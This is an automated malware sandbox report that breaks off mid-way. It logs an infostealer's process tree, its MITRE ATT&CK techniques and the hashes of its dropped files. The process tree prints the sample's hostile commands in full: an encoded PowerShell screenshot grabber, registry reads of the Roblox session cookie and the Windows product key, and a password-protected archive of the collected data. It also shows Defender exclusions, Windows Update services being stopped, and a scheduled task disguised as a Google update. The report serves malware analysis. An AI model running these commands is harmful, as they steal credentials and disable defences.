C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
7⤵
PID:5228

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5728

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sgqf4wme\sgqf4wme.cmdline"
9⤵
PID:5644

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB20A.tmp" "c:\Users\Admin\AppData\Local\Temp\sgqf4wme\CSC32C942C37FA84486A45311F82F616A17.TMP"
10⤵
PID:6372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:5520

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:6004

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:5388

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:5512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:5112

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:6356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:6428

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:6452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
7⤵
PID:6500

C:\Windows\system32\tree.com
tree /A /F
8⤵
PID:6604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
7⤵
PID:6796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
7⤵
PID:7196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
7⤵
PID:7452

C:\Windows\system32\getmac.exe
getmac
8⤵
PID:7476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI5882\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\Tzt2G.zip" *"
7⤵
PID:7544

C:\Users\Admin\AppData\Local\Temp\_MEI5882\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI5882\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\Tzt2G.zip" *
8⤵
- Executes dropped EXE
PID:7572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
7⤵
PID:7792

C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:7808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
7⤵
PID:7864

C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
8⤵
PID:7900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
7⤵
PID:7968

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
8⤵
PID:8000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
7⤵
PID:8040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
8⤵
PID:8072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
7⤵
PID:5748

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
8⤵
- Detects videocard installed
PID:6120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
7⤵
PID:5796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
8⤵
PID:5596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5264

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:5860

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:2752

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:6184

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:6196

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:6224

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:6240

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:6256

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6272

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
1⤵
- Scheduled Task/Job: Scheduled Task
PID:6368

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:4076

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
2⤵
PID:6372

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:6484

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

System Services

Service Execution

Scheduled Task/Job

Scheduled Task

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

Netsh Helper DLL

Scheduled Task/Job

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

Netsh Helper DLL

Scheduled Task/Job

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe
Filesize
50.0MB

MD5
368ef3029f5967eb548a2808e17c939d

SHA1
8ad2b0a66049c3ad1203dd932db864fea61be54f

SHA256
2da501d6e97d81c6cf89602482f58911a24c16688d453b97bb6cc640f2834fed

SHA512
6b8c23f8a3e2c868051e1a49fb291da95cafbd84630334e21df96a997d9105d9ca378a0a3e0501c96c2c01368680a4784944ea09f3ad6fa6c2d7cf37b4611e6c

Download Submit
C:\ProgramData\Microsoft\hacn.exe
Filesize
24.0MB

MD5
70d8f32540470db5df9d39deed7bd6cb

SHA1
a14147440736d4f1427193cd206f519890b9f2f2

SHA256
858bdc7b94a957a182492a2d21e096b2fb2ab5317ae9e3e882243ad80953227e

SHA512
522fc6bc180c5e9e7bc60ece7404162692f0a7902923465082cf5449bc9d2f247b8e7d60f7f0bf5a24bf98fc07826b743a49b71eba406f6073990c3355944870

Download Submit
C:\ProgramData\main.exe
Filesize
5.6MB

MD5
3d3c49dd5d13a242b436e0a065cd6837

SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b

SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

Download Submit
C:\ProgramData\setup.exe
Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe
Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt
Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\Build.exe
Filesize
31.4MB

MD5
695aaf30611017d09c6509385b68e27f

SHA1
b9c1da6e7736b105354acbd272f4a0c224004262

SHA256
cadbe355ffd81ea12ce4678b9dbd05a38e6a619886068253181ab74b7356c3dc

SHA512
d1970c7aedab7a531e4ecda9c6fcb753e32cb0f9a66bee79aa813362d3e5078f9b573726dbb0d8ed54b9f7312f259fc801ad13b8278e649954b51fd70bd380c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\VCRUNTIME140.dll
Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_bz2.pyd
Filesize
48KB

MD5
85c70974fac8e621ed6e3e9a993fbd6f

SHA1
f83974e64aa57d7d027b815e95ebd7c8e45530f1

SHA256
610983bbcb8ee27963c17ead15e69ad76ec78fac64deb7345ca90d004034cdd6

SHA512
142792750e4a5189dbeaa710e3f5b3689d593927ea77ded00eb5caada6b88d82a37459770845f1ea7c9f45da5a6ae70e19bfcf76d9f1a56184c3164b736bcb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_decimal.pyd
Filesize
105KB

MD5
3923e27b9378da500039e996222ffee6

SHA1
a9280559a71abf390348e1b6a0fb1f2409649189

SHA256
0275b03041f966e587d1c4c50266c3fdff1e1a65f652ad07b59cb85845b5457e

SHA512
051c613403fd80b9582dd48c1f38870cb26846d54b75603ea52a78202a72272107e95750de78cd8f6c56951ebde501b4892d90fb306326b86124c8cc97bca594

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_hashlib.pyd
Filesize
35KB

MD5
c8b153f0be8569ce2c2de3d55952d9c7

SHA1
0861d6dcd9b28abb8b69048caf3c073e94f87fdc

SHA256
af9f39d2a5d762214f6de2c8fec0a5bc6be0b8223ef47164caa4c6e3d6437a58

SHA512
81ccbfff0f4cdd1502af9d73928b940098b9acc58b19c1a939ecdf17418096294af4a4529ee7a0bbe1c686e3b0254651e211c1093264d1835065a82711ac0379

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_lzma.pyd
Filesize
85KB

MD5
bc2ebd2a95619ab14a16944b0ab8bde5

SHA1
c31ba45b911a2664fc622bb253374ab7512fc35a

SHA256
aeb3fd8b855b35204b5088c7a1591cc1ca78fffe707d70e41d99564b6cb617c6

SHA512
86a6685efec72860991c0f0fa50f46a208211d3f8fc44012b12437d141c5f1a24c34a366f164d225869680707b482ab27a2720c698ebe8026f1c5807e81f8437

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\_socket.pyd
Filesize
44KB

MD5
f6d0876b14bca5a264ec231895d80072

SHA1
d68b662cfc247c07851ef0764fe9652e3e2c0981

SHA256
bcbf9a952473e53f130ce77b0db69fe08c5845ce10dbe8c320b40f171a15d6a8

SHA512
1db02975634ffcc4e73fac355d7f67a915c3b4189feaf9e7b24ef831e9f4a2e60a4bd1ebfd8157282a4094814332d62957fcd204b20f2904527e203ab355ab8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\base_library.zip
Filesize
1.3MB

MD5
4cd74e70336c96f7172a114dfa74eb25

SHA1
4d96748b2221857d3698499597884ae0ea639ee3

SHA256
1e5198462510015a5b855ea01e287fa9d765be4357cba60cfedafb9b1b33bdf4

SHA512
9cd4e846aadfe79d086ce285e9dd58f241f67791a9b87c327852676f3c3f543832032de1dd6bac33f268bd782c2fd30fce49e4262da8ff052bc3f4684057dba9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\libcrypto-3.dll
Filesize
1.6MB

MD5
27515b5bb912701abb4dfad186b1da1f

SHA1
3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

SHA256
fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

SHA512
087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\python312.dll
Filesize
1.7MB

MD5
86d9b8b15b0340d6ec235e980c05c3be

SHA1
a03bdd45215a0381dcb3b22408dbc1f564661c73

SHA256
12dbbcd67015d6cdb680752184107b7deb84e906b0e8e860385f85d33858a5f6

SHA512
d360cc3f00d90fd04cbba09d879e2826968df0c1fdc44890c60b8450fe028c3e767450c3543c62d4f284fb7e004a9a33c52538c2279221ee6cbdb1a9485f88b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\select.pyd
Filesize
25KB

MD5
cce3e60ec05c80f5f5ee014bc933554c

SHA1
468d2757b201d6259034215cfd912e8e883f4b9e

SHA256
84a81cca6d80edd9ec2d31926231de393ed7f26ed86ae39219adc5eab24b8100

SHA512
7cbcee4dd4c817fbef8b9aef2d457b56970c5e5c03bdf2caf74415316b44e7da33ee39b6a434f4760c80f74c33b5c0c5ad00936d438b947a39ffcd53e890cf0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41202\unicodedata.pyd
Filesize
295KB

MD5
427668e55e99222b3f031b46fb888f3a

SHA1
c9be630cb2536c20bbc6fc9ba4a57889cdb684bc

SHA256
